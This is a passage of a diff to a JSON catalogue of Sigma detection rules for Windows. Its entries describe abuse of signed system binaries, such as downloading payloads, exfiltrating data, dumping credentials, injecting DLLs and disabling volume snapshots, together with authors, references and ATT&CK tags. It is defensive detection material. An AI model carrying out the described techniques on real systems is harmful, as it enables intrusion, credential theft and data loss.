ConfigSecurityPolicy Execution" - }, - { - "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", - "meta": { - "author": "blueteamer8699", - "creation_date": "2022/01/03", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" - ] - }, - "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", - "value": "GatherNetworkInfo.vbs Script Usage" - }, - { - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_customshellhost.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/180", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", - "value": "Suspicious CustomShellHost Execution" - }, - { - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "meta": { - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", - "creation_date": "2021/09/30", - "falsepositive": [ - "DataSvcUtil.exe being used may be 
performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", - "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567" - ] - }, - "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", - "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" - }, - { - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/147", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" - ], - "tags": [ - "attack.defense_evasion", - 
"attack.t1218" - ] - }, - "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", - "value": "DeviceCredentialDeployment Execution" - }, - { - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Very Possible" - ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", - "value": "Suspicious Diantz Alternate Data Stream Execution" - }, - { - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", - "value": "Suspicious Diantz Download and Compress Into a CAB File" - }, - { - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/09/20", - "falsepositive": [ - "Windows installed on non-C drive" - ], - "filename": 
"proc_creation_win_lolbin_dll_sideload_xwizard.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", - "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" - ], - "tags": [ - "attack.defense_evasion", "attack.t1574.002" ] }, - "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", - "value": "Xwizard DLL Sideloading" + "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "value": "Tasks Folder Evasion" }, { - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", "meta": { - "author": "Austin Songer @austinsonger, Florian Roth", - "creation_date": "2021/11/26", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", "falsepositive": [ - "Dump64.exe in other folders than the excluded one" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." 
], - "filename": "proc_creation_win_lolbin_dump64.yml", + "filename": "proc_creation_win_remote_powershell_session_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1021.006" + ] + }, + "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", + "value": "Remote PowerShell Session Host Process (WinRM)" + }, + { + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1460597833917251595", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ] }, - "uuid": "129966c9-de17-4334-a123-8b58172e664d", - "value": "Suspicious Dump64.exe Execution" + "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "value": "DllRegisterServer Call From Non Rundll32" }, { - "description": "Adversaries can abuse winget to download payloads remotely 
and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", + "description": "Detects commands that temporarily turn off Volume Snapshots", "meta": { - "author": "Sreeman, Florian Roth, Frack113", - "creation_date": "2020/04/21", + "author": "Florian Roth", + "creation_date": "2021/01/28", "falsepositive": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." + "Legitimate administration" ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", - "value": "Monitoring Winget For LOLbin Execution" - }, - { - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_extexport.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": 
"fb0b815b-f5f6-4f50-970f-ffe21f253f7a", - "value": "Suspicious Extexport Execution" - }, - { - "description": "Download or Copy file with Extrac32", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_extrac32.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", - "value": "Suspicious Extrac32 Execution" - }, - { - "description": "Extract data from cab file and hide it in an alternate data stream", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", - "value": "Suspicious Extrac32 Alternate Data Stream Execution" - }, - { - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "meta": { - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", - "creation_date": "2020/10/05", - "falsepositive": [ - "Administrative findstr usage" - ], - "filename": "proc_creation_win_lolbin_findstr.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": 
"windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" - ] - }, - "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", - "value": "Abusing Findstr for Defense Evasion" - }, - { - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/14", - "falsepositive": [ - "Legitimate use by a via a batch script or by an administrator." - ], - "filename": "proc_creation_win_lolbin_forfiles.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "value": "Use of Forfiles For Execution" - }, - { - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "meta": { - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/02", - "falsepositive": [ - "Legitimate use by a software developer." 
- ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", - "value": "Use of FSharp Interpreters" - }, - { - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_ftp.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", - "value": "LOLBIN Execution Of The FTP.EXE Binary" - }, - { - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "meta": { - "author": "frack113", - "creation_date": "2022/05/16", - "falsepositive": [ - "Legitimate uses of logon scripts distributed via group policy" - ], - "filename": 
"proc_creation_win_lolbin_gpscript.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", - "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "1e59c230-6670-45bf-83b0-98903780607e", - "value": "Gpscript Execution" - }, - { - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "meta": { - "author": "frack113", - "creation_date": "2022/05/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", - "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", - "value": "Ie4uinit Lolbin Use From Invalid Path" - }, - { - "description": "Detects execution of the IEExec utility to download payloads", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/05/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml", + "filename": "proc_creation_win_susp_volsnap_disable.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" - ], - "tags": "No established tags" - }, - "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "value": "Abusing IEExec To Download Payloads" - }, - { - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "meta": { - "author": "frack113", - "creation_date": "2022/05/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_ilasm.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", - "https://www.echotrail.io/insights/search/ilasm.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" + "https://twitter.com/0gtweet/status/1354766164166115331", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1562.001" ] }, - "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", - "value": "Ilasm Lolbin Use Compile C-Sharp" - }, - { - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. 
The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_installutil_download.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/239", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", - "value": "Suspicious Execution of InstallUtil To Download" - }, - { - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "meta": { - "author": "frack113", - "creation_date": "2022/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_jsc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", - "value": "JSC Convert Javascript To Executable" - }, - { - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_kavremover.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "value": "Kavremover Dropped Binary LOLBIN Usage" - }, - { - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Legitimate usage of the script by a developer" - ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1535981653239255040", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216.001" - ] - }, - "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", - "value": "Launch-VsDevShell.PS1 Proxy Execution" - }, - { - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2021/07/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - 
"https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" - ] - }, - "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", - "value": "Mavinject Inject DLL Into Running Process" + "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "value": "Disabled Volume Snapshots" }, { "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", 
@@ -40507,404 +32538,910 @@ "value": "Use of Mftrace.exe" }, { - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/13", + "author": "Florian Roth", + "creation_date": "2021/05/27", "falsepositive": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Possible but rare" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", + "filename": "proc_creation_win_susp_rundll32_no_params.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" + "https://www.cobaltstrike.com/help-opsec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1202" ] }, - "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "value": "Execute MSDT Via Answer File" + "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", + "value": "Suspicious Rundll32 Without Any CommandLine Params" }, { - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. 
CVE-2022-41120)", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", + "author": "Florian Roth, Tim Shelton (fp werfault)", + "creation_date": "2022/11/10", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml", + "filename": "proc_creation_win_sysmon_exploitation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/filip_dragovic/status/1590104354727436290", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", + "https://twitter.com/filip_dragovic/status/1590052248260055041", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" + ], + "tags": "No established tags" + }, + "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "value": "Suspicious Sysmon as Execution Parent" + }, + { + "description": "Detects a process memory dump performed by RdrLeakDiag.exe", + "meta": { + "author": "Cedric MAURUGEON", + "creation_date": "2021/09/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "value": "Process Dump via RdrLeakDiag.exe" + }, + { + "description": "Detects specific process parameters as used by Mustang Panda droppers", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_mustangpanda.yml", + "level": "high", + "logsource.category": 
"process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", + "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "value": "Mustang Panda Dropper" + }, + { + "description": "Detects the use of a Visual Studio bundled tool named DumpMinitool.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_dumpminitool.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" + "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" ], "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.t1036", + "attack.t1003.001" ] }, - "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", - "value": "Download Arbitrary Files Via MSOHTMED.EXE" + "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", + "value": "DumpMinitool Usage" }, { - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with 
py2exe", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", + "author": "Markus Neis, Sander Wiebing", + "creation_date": "2018/11/22", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml", + "filename": "proc_creation_win_susp_file_characteristics.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" + "https://securelist.com/muddywater/88059/", + "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.006" + ] + }, + "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "value": "Suspicious File Characteristics Due to Missing Fields" + }, + { + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_crime_maze_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", + 